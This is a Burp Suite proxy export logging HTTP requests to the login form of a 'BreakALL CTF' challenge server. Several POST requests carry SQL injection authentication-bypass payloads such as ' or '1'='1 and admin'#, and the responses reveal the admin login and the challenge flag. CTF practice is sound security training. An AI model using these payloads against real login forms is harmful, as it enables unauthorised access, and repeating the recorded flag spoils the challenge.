<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 10:23:27 CST 2018">
  <item>
    <time>Thu Dec 13 10:14:22 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:2002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown
Connection: close

]]></request>
    <status>200</status>
    <responselength>358</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:14:22 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Tue, 08 Aug 2017 17:09:44 GMT
ETag: "55-55641079ac600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 85
Connection: close
Content-Type: text/html

<html>
<body>
<meta http-equiv='refresh' content='0;url=index.php' />
</body>
</html>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:14:22 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php HTTP/1.1
Host: 140.110.112.32:2002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown
Connection: close

]]></request>
    <status>200</status>
    <responselength>1293</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:14:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1080
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Login</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <link href="css/signin.css" rel="stylesheet">
    <script src="js/ie-emulation-modes-warning.js"></script>
  </head>
  <body>

    <div class="container">

      <form class="form-signin" name="form" method="post" action="connect.php">
        <h2 align="center">BreakALL CTF</h2>
        <input type="text" name="name" class="form-control" placeholder="ID" >

        <input type="password" name="pw" class="form-control" placeholder="Password" >

        <button class="btn btn-lg btn-primary btn-block" type="submit">￧ﾙﾻ￥ﾅﾥ</button>
      </form>

    </div> 
    <script src="js/ie10-viewport-bug-workaround.js"></script>
  </body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:14:33 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 9
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown
Connection: close

name=&pw=]]></request>
    <status>200</status>
    <responselength>1016</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:14:33 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=q748je1sgolidua20u7hmsj472; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 609
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-danger'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￥ﾤﾱ￦ﾕﾗ</div>    </div>    <meta http-equiv='refresh' content='1;url=index.php' />    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:09 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 31
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name=' or '1'='1&pw=' or '1'='1]]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:09 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=e0v6e02pph4oeipunlp2kh7q34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:18 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 27
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name='or'1'='1&pw='or'1'='1]]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=1skuig4pv3ljk7m1i4bklhplb7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:26 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 23
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name='or''='&pw='or''=']]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:26 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=tcnihba0dhgukeo59qu8et4710; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:34 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 21
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name=admin&pw='or''=']]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=073jmvudon2859b6u19f9cgcd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:41 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 24
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name=admin&pw='or'1'!='2]]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=kpgitk2ptusinks69ac4fkr0f0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 10:21:49 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2002/connect.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2002</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/connect.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /connect.php HTTP/1.1
Host: 140.110.112.32:2002
Content-Length: 16
Cache-Control: max-age=0
Origin: http://140.110.112.32:2002
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=unknown;
Connection: close

name=admin'#&pw=]]></request>
    <status>200</status>
    <responselength>1083</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 02:21:49 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Set-Cookie: PHPSESSID=rkfm3036ud5tjviecs0f8rlou2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

￯ﾻ﾿<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
</head>
<body>
 



<div class='container'>  <h2>￧ﾙﾻ￥ﾅﾥ￨ﾨﾊ￦ﾁﾯ</h2> <div class='panel panel-info'>     <div class='panel-heading'>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ</div>     <div class='panel-body'>￥ﾸﾳ￨ﾙﾟ : admin </div>     <div class='panel-body'>￥ﾯﾆ￧ﾢﾼ : BreakALLCTF{7kZOJ1RioM8mPbfdfU84} </div>    </div>    </div>    </div>

 

</body>
</html>
]]></response>
    <comment></comment>
  </item>
</items>
